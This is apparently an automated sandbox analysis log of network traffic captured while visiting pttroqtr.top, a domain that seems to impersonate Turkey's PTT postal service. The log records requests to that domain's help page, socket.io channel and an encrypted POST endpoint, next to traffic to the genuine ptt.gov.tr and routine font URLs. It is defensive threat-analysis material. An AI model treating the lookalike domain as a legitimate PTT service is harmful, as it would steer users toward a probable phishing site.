Source: global trafficHTTP traffic detected: GET /storage/media?gcs_file_name=chat/chat_icons/3af51a49-058b-4e67-9af9-1575813efeeb.png&chat_icon=true HTTP/1.1Host: pttem.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /chat/get_my_widget_settings?widget_key=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t&escapeHtml=false HTTP/1.1Host: pttem.alo-tech.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /Sayfalar/Kargo/AmbalajHizmetleri.aspx HTTP/1.1Host: www.ptt.gov.trConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: undefined=1; _ga=GA1.1.1443587032.1727494784; _ga_SFQ172Y7CH=GS1.1.1727494784.1.1.1727494819.0.0.0
Source: global trafficHTTP traffic detected: GET /storage/media?gcs_file_name=chat/chat_icons/3af51a49-058b-4e67-9af9-1575813efeeb.png&chat_icon=true HTTP/1.1Host: pttem.alo-tech.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /chat/alochat.js?widget_key=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t HTTP/1.1Host: pttem.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.ptt.gov.tr/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /content/spa.html?hostname=pttem.alo-tech.com&lang=tr&queue=[{%22name%22:%22Whatsapp%20Chat%22,%22key%22:%22ahRzfm11c3RlcmktaGl6bWV0bGVyaXISCxIFUXVldWUYgIC47ozj_ggMogEScHR0ZW0uYWxvLXRlY2guY29t%22}]&client_name=&client_email=&phone_number=&cwid=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t&page_origin=https%3A%2F%2Fwww.ptt.gov.tr HTTP/1.1Host: chatserver.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.ptt.gov.tr/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pttem.alo-tech.com_ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t_cookieEnable=true
Source: global trafficHTTP traffic detected: GET /chat/alochat.js?widget_key=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t HTTP/1.1Host: pttem.alo-tech.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /chat/alochat.css?wid=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t HTTP/1.1Host: pttem.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /Sayfalar/Banka/OdemeIslemleriUst.aspx HTTP/1.1Host: www.ptt.gov.trConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: undefined=1; _ga=GA1.1.1443587032.1727494784; _ga_SFQ172Y7CH=GS1.1.1727494784.1.1.1727494823.0.0.0
Source: global trafficHTTP traffic detected: GET /chat/alochat.js?widget_key=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t HTTP/1.1Host: pttem.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.ptt.gov.tr/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /chat/alochat.js?widget_key=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t HTTP/1.1Host: pttem.alo-tech.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /content/spa.html?hostname=pttem.alo-tech.com&lang=tr&queue=[{%22name%22:%22Whatsapp%20Chat%22,%22key%22:%22ahRzfm11c3RlcmktaGl6bWV0bGVyaXISCxIFUXVldWUYgIC47ozj_ggMogEScHR0ZW0uYWxvLXRlY2guY29t%22}]&client_name=&client_email=&phone_number=&cwid=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t&page_origin=https%3A%2F%2Fwww.ptt.gov.tr HTTP/1.1Host: chatserver.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.ptt.gov.tr/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pttem.alo-tech.com_ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t_cookieEnable=true
Source: global trafficHTTP traffic detected: GET /chat/alochat.css?wid=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t HTTP/1.1Host: pttem.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8sjjxx HTTP/1.1Host: pttroqtr.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pttroqtr.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8sjjxx HTTP/1.1Host: pttroqtr.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help HTTP/1.1Host: pttroqtr.topConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: chromecache_293.2.dr, chromecache_325.2.drString found in binary or memory: return b}DC.H="internal.enableAutoEventOnTimer";var gc=ja(["data-gtm-yt-inspected-"]),FC=["www.youtube.com","www.youtube-nocookie.com"],GC,HC=!1; equals www.youtube.com (Youtube)
Source: global trafficDNS traffic detected: DNS query: pttroqtr.top
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: www.ptt.gov.tr
Source: global trafficDNS traffic detected: DNS query: pttem.alo-tech.com
Source: global trafficDNS traffic detected: DNS query: chatserver.alo-tech.com
Source: global trafficDNS traffic detected: DNS query: netdna.bootstrapcdn.com
Source: global trafficDNS traffic detected: DNS query: service-edge.alo-tech.com
Source: unknownHTTP traffic detected: POST /api/MC45ODQ1NjY2NzE5MzU4MDAy HTTP/1.1Host: pttroqtr.topConnection: keep-aliveContent-Length: 292sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: text/encryptAccept: */*Origin: https://pttroqtr.topSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pttroqtr.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0Date: Sat, 28 Sep 2024 03:39:28 GMTTransfer-Encoding: chunkedConnection: closeAccess-Control-Allow-Origin: *
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0Date: Sat, 28 Sep 2024 03:39:31 GMTTransfer-Encoding: chunkedConnection: closeAccess-Control-Allow-Origin: *
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0Date: Sat, 28 Sep 2024 03:39:33 GMTTransfer-Encoding: chunkedConnection: closeAccess-Control-Allow-Origin: *
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0Date: Sat, 28 Sep 2024 03:39:35 GMTTransfer-Encoding: chunkedConnection: closeAccess-Control-Allow-Origin: *
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: private, no-cache, no-store, max-age=0, must-revalidateKeep-Alive: timeout=5Content-Type: text/html; charset=utf-8ETag: "243ff-APl8/WCAEh2rB7zwncVxTiEo0c0"Vary: Accept-EncodingDate: Sat, 28 Sep 2024 03:39:38 GMTContent-Length: 148479Strict-Transport-Security: max-age=15552000; includeSubDomains; preload
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: private, no-cache, no-store, max-age=0, must-revalidateKeep-Alive: timeout=5Content-Type: text/html; charset=utf-8ETag: "243f3-kcbB99g17QIh07osahvfHBPDgLE"Vary: Accept-EncodingDate: Sat, 28 Sep 2024 03:39:52 GMTContent-Length: 148467Strict-Transport-Security: max-age=15552000; includeSubDomains; preload
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: private, no-cache, no-store, max-age=0, must-revalidateKeep-Alive: timeout=5Content-Type: text/html; charset=utf-8ETag: "243db-yRYYB+QRIbWItBhHE3G1bkDrvk4"Vary: Accept-EncodingDate: Sat, 28 Sep 2024 03:39:57 GMTContent-Length: 148443Strict-Transport-Security: max-age=15552000; includeSubDomains; preload
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: private, no-cache, no-store, max-age=0, must-revalidateKeep-Alive: timeout=5Content-Type: text/html; charset=utf-8ETag: "243ff-JInttBiLPfCaIMFuWkquwkPSzc8"Vary: Accept-EncodingDate: Sat, 28 Sep 2024 03:40:03 GMTContent-Length: 148479Strict-Transport-Security: max-age=15552000; includeSubDomains; preload
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: private, no-cache, no-store, max-age=0, must-revalidateKeep-Alive: timeout=5Content-Type: text/html; charset=utf-8ETag: "24405-aUSpQFsnmbaU0DrPnNJSkIl6XCo"Vary: Accept-EncodingDate: Sat, 28 Sep 2024 03:40:10 GMTContent-Length: 148485Strict-Transport-Security: max-age=15552000; includeSubDomains; preload
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: private, no-cache, no-store, max-age=0, must-revalidateKeep-Alive: timeout=5Content-Type: text/html; charset=utf-8ETag: "2440d-JavTbhHXf7wnQ/U+gHii2tDFdA0"Vary: Accept-EncodingDate: Sat, 28 Sep 2024 03:40:15 GMTContent-Length: 148493Strict-Transport-Security: max-age=15552000; includeSubDomains; preload
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: private, no-cache, no-store, max-age=0, must-revalidateKeep-Alive: timeout=5Content-Type: text/html; charset=utf-8ETag: "243f7-b7LpQS0zpte5fUz8O+FznCDaye0"Vary: Accept-EncodingDate: Sat, 28 Sep 2024 03:40:19 GMTContent-Length: 148471Strict-Transport-Security: max-age=15552000; includeSubDomains; preload
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: private, no-cache, no-store, max-age=0, must-revalidateKeep-Alive: timeout=5Content-Type: text/html; charset=utf-8ETag: "243f5-1Ce9ToF3VZ9qmnAEXzagGsQvdL8"Vary: Accept-EncodingDate: Sat, 28 Sep 2024 03:40:22 GMTContent-Length: 148469Strict-Transport-Security: max-age=15552000; includeSubDomains; preload
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: private, no-cache, no-store, max-age=0, must-revalidateKeep-Alive: timeout=5Content-Type: text/html; charset=utf-8ETag: "243f5-Qy+tMInuF0dxDTAZYzJ8FGI79xc"Vary: Accept-EncodingDate: Sat, 28 Sep 2024 03:40:27 GMTContent-Length: 148469Strict-Transport-Security: max-age=15552000; includeSubDomains; preload
Source: chromecache_219.2.drString found in binary or memory: http://creativecommons.org/licenses/by/3.0/
Source: chromecache_350.2.drString found in binary or memory: http://daneden.me/animate
Source: chromecache_350.2.dr, chromecache_219.2.drString found in binary or memory: http://fontawesome.io
Source: chromecache_219.2.drString found in binary or memory: http://fontawesome.io.
Source: chromecache_350.2.drString found in binary or memory: http://fontawesome.io/license
Source: chromecache_350.2.dr, chromecache_198.2.dr, chromecache_326.2.dr, chromecache_327.2.drString found in binary or memory: http://getbootstrap.com)
Source: chromecache_350.2.drString found in binary or memory: http://ianlunn.co.uk/
Source: chromecache_350.2.drString found in binary or memory: http://ianlunn.github.io/Hover/)
Source: chromecache_350.2.drString found in binary or memory: http://jqueryui.com
Source: chromecache_350.2.drString found in binary or memory: http://jqueryui.com/themeroller/?bgShadowXPos=&bgOverlayXPos=&bgErrorXPos=&bgHighlightXPos=&bgConten
Source: chromecache_219.2.drString found in binary or memory: http://kyruus.com
Source: chromecache_219.2.drString found in binary or memory: http://opensource.org/licenses/mit-license.html
Source: chromecache_219.2.drString found in binary or memory: http://scripts.sil.org/OFL
Source: chromecache_219.2.drString found in binary or memory: http://twitter.com/byscuits
Source: chromecache_219.2.drString found in binary or memory: http://twitter.com/fontawesome.
Source: chromecache_356.2.drString found in binary or memory: http://www.dardenstudio.com/http://www.dardenstudio.com/http://typekit.com/eulas/0000000000000000000
Source: chromecache_350.2.drString found in binary or memory: http://www.opensource.org/licenses/mit-license.php
Source: chromecache_325.2.drString found in binary or memory: https://adservice.google.com/pagead/regclk?
Source: chromecache_293.2.dr, chromecache_325.2.drString found in binary or memory: https://cct.google/taggy/agent.js
Source: chromecache_282.2.dr, chromecache_253.2.drString found in binary or memory: https://fontawesome.com
Source: chromecache_282.2.dr, chromecache_253.2.drString found in binary or memory: https://fontawesome.com/license/free
Source: chromecache_291.2.drString found in binary or memory: https://fonts.gstatic.com/s/alegreya/v27/4UacrEBBsBhlBjvfkQjt71kZfyBzPgNG9hU4-6qj.woff2)
Source: chromecache_291.2.drString found in binary or memory: https://fonts.gstatic.com/s/alegreya/v27/4UacrEBBsBhlBjvfkQjt71kZfyBzPgNG9hU4-KqjgSE.woff2)
Source: chromecache_291.2.drString found in binary or memory: https://fonts.gstatic.com/s/alegreya/v27/4UacrEBBsBhlBjvfkQjt71kZfyBzPgNG9hU496qjgSE.woff2)
Source: chromecache_291.2.drString found in binary or memory: https://fonts.gstatic.com/s/alegreya/v27/4UacrEBBsBhlBjvfkQjt71kZfyBzPgNG9hU49KqjgSE.woff2)
Source: chromecache_291.2.drString found in binary or memory: https://fonts.gstatic.com/s/alegreya/v27/4UacrEBBsBhlBjvfkQjt71kZfyBzPgNG9hU49aqjgSE.woff2)
Source: chromecache_291.2.drString found in binary or memory: https://fonts.gstatic.com/s/alegreya/v27/4UacrEBBsBhlBjvfkQjt71kZfyBzPgNG9hU49qqjgSE.woff2)
Source: chromecache_291.2.drString found in binary or memory: https://fonts.gstatic.com/s/alegreya/v27/4UacrEBBsBhlBjvfkQjt71kZfyBzPgNG9hU4_6qjgSE.woff2)
Source: chromecache_291.2.drString found in binary or memory: https://fonts.gstatic.com/s/allan/v20/ea8XadU7WuTxEub_NdW18g.woff2)
Source: chromecache_291.2.drString found in binary or memory: https://fonts.gstatic.com/s/allan/v20/ea8XadU7WuTxEubxNdU.woff2)
Source: chromecache_291.2.drString found in binary or memory: https://fonts.gstatic.com/s/barlow/v12/7cHpv4kjgoGqM7E_A8s52Hs.woff2)
Source: chromecache_291.2.drString found in binary or memory: https://fonts.gstatic.com/s/barlow/v12/7cHpv4kjgoGqM7E_Ass52Hs.woff2)
Source: chromecache_291.2.drString found in binary or memory: https://fonts.gstatic.com/s/barlow/v12/7cHpv4kjgoGqM7E_DMs5.woff2)
Source: chromecache_291.2.drString found in binary or memory: https://fonts.gstatic.com/s/breeserif/v17/4UaHrEJCrhhnVA3DgluA96Tp56N1.woff2)
Source: chromecache_291.2.drString found in binary or memory: https://fonts.gstatic.com/s/breeserif/v17/4UaHrEJCrhhnVA3DgluA96rp5w.woff2)
Source: chromecache_291.2.drString found in binary or memory: https://fonts.gstatic.com/s/cabin/v24/u-4X0qWljRw-PfU81xCKCpdpbgZJl6XFpfEd7eA9BIxxkV2EH7alxw.woff2)
Source: chromecache_291.2.drString found in binary or memory: https://fonts.gstatic.com/s/cabin/v24/u-4X0qWljRw-PfU81xCKCpdpbgZJl6XFpfEd7eA9BIxxkV2EH7ilx17r.woff2
Source: chromecache_291.2.drString found in binary or memory: https://fonts.gstatic.com/s/cabin/v24/u-4X0qWljRw-PfU81xCKCpdpbgZJl6XFpfEd7eA9BIxxkV2EH7mlx17r.woff2
Source: chromecache_291.2.drString found in binary or memory: https://fonts.gstatic.com/s/lato/v23/S6uyw4BMUTPHjx4wXg.woff2)
Source: chromecache_291.2.drString found in binary or memory: https://fonts.gstatic.com/s/lato/v23/S6uyw4BMUTPHjxAwXjeu.woff2)
Source: chromecache_291.2.drString found in binary or memory: https://fonts.gstatic.com/s/lekton/v17/SZc43FDmLaWmWpBuVh3prUM.woff2)
Source: chromecache_291.2.drString found in binary or memory: https://fonts.gstatic.com/s/lekton/v17/SZc43FDmLaWmWpBuWB3p.woff2)
Source: chromecache_291.2.drString found in binary or memory: https://fonts.gstatic.com/s/librebodoni/v2/_Xm--H45qDWDYULr5OfyZudXzSBgY2oMBGte6I1f8WTTcdb3.woff2)
Source: chromecache_291.2.drString found in binary or memory: https://fonts.gstatic.com/s/librebodoni/v2/_Xm--H45qDWDYULr5OfyZudXzSBgY2oMBGte6I1f8WXTcdb3.woff2)
Source: chromecache_291.2.drString found in binary or memory: https://fonts.gstatic.com/s/librebodoni/v2/_Xm--H45qDWDYULr5OfyZudXzSBgY2oMBGte6I1f8WvTcQ.woff2)
Source: chromecache_291.2.drString found in binary or memory: https://fonts.gstatic.com/s/mousememoirs/v13/t5tmIRoSNJ-PH0WNNgDYxdSb3T7Prw.woff2)
Source: chromecache_291.2.drString found in binary or memory: https://fonts.gstatic.com/s/mousememoirs/v13/t5tmIRoSNJ-PH0WNNgDYxdSb3TDPr6OH.woff2)
Source: chromecache_291.2.drString found in binary or memory: https://fonts.gstatic.com/s/mulish/v11/1Ptyg83HX_SGhgqO0yLcmjzUAuWexZNR8aOvG4w-.woff2)
Source: chromecache_291.2.drString found in binary or memory: https://fonts.gstatic.com/s/mulish/v11/1Ptyg83HX_SGhgqO0yLcmjzUAuWexZNR8aevGw.woff2)
Source: chromecache_291.2.drString found in binary or memory: https://fonts.gstatic.com/s/mulish/v11/1Ptyg83HX_SGhgqO0yLcmjzUAuWexZNR8aivG4w-.woff2)
Source: chromecache_291.2.drString found in binary or memory: https://fonts.gstatic.com/s/mulish/v11/1Ptyg83HX_SGhgqO0yLcmjzUAuWexZNR8amvG4w-.woff2)
Source: chromecache_291.2.drString found in binary or memory: https://fonts.gstatic.com/s/mulish/v11/1Ptyg83HX_SGhgqO0yLcmjzUAuWexZNR8aqvG4w-.woff2)
Source: chromecache_291.2.drString found in binary or memory: https://fonts.gstatic.com/s/newscycle/v20/CSR64z1Qlv-GDxkbKVQ_fO4KTet_.woff2)
Source: chromecache_291.2.drString found in binary or memory: https://fonts.gstatic.com/s/newscycle/v20/CSR64z1Qlv-GDxkbKVQ_fOAKTQ.woff2)
Source: chromecache_291.2.drString found in binary or memory: https://fonts.gstatic.com/s/nunito/v23/XRXI3I6Li01BKofiOc5wtlZ2di8HDLshdTA3j77e.woff2)
Source: chromecache_291.2.drString found in binary or memory: https://fonts.gstatic.com/s/nunito/v23/XRXI3I6Li01BKofiOc5wtlZ2di8HDLshdTQ3jw.woff2)
Source: chromecache_291.2.drString found in binary or memory: https://fonts.gstatic.com/s/nunito/v23/XRXI3I6Li01BKofiOc5wtlZ2di8HDLshdTk3j77e.woff2)
Source: chromecache_291.2.drString found in binary or memory: https://fonts.gstatic.com/s/nunito/v23/XRXI3I6Li01BKofiOc5wtlZ2di8HDLshdTo3j77e.woff2)
Source: chromecache_291.2.drString found in binary or memory: https://fonts.gstatic.com/s/nunito/v23/XRXI3I6Li01BKofiOc5wtlZ2di8HDLshdTs3j77e.woff2)
Source: chromecache_291.2.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v28/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsjZ0B4gaVI
Source: chromecache_291.2.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v28/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsjZ0B4iaVI
Source: chromecache_291.2.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v28/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsjZ0B4jaVI
Source: chromecache_291.2.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v28/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsjZ0B4kaVI
Source: chromecache_291.2.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v28/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsjZ0B4saVI
Source: chromecache_291.2.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v28/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsjZ0B4taVI
Source: chromecache_291.2.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v28/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsjZ0B4uaVI
Source: chromecache_291.2.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v28/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsjZ0B4vaVI
Source: chromecache_291.2.drString found in binary or memory: https://fonts.gstatic.com/s/poppins/v19/pxiEyp8kv8JHgFVrJJbecmNE.woff2)
Source: chromecache_291.2.drString found in binary or memory: https://fonts.gstatic.com/s/poppins/v19/pxiEyp8kv8JHgFVrJJfecg.woff2)
Source: chromecache_291.2.drString found in binary or memory: https://fonts.gstatic.com/s/poppins/v19/pxiEyp8kv8JHgFVrJJnecmNE.woff2)
Source: chromecache_291.2.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v29/KFOmCnqEu92Fr1Mu4WxKOzY.woff2)
Source: chromecache_291.2.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v29/KFOmCnqEu92Fr1Mu4mxK.woff2)
Source: chromecache_291.2.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v29/KFOmCnqEu92Fr1Mu5mxKOzY.woff2)
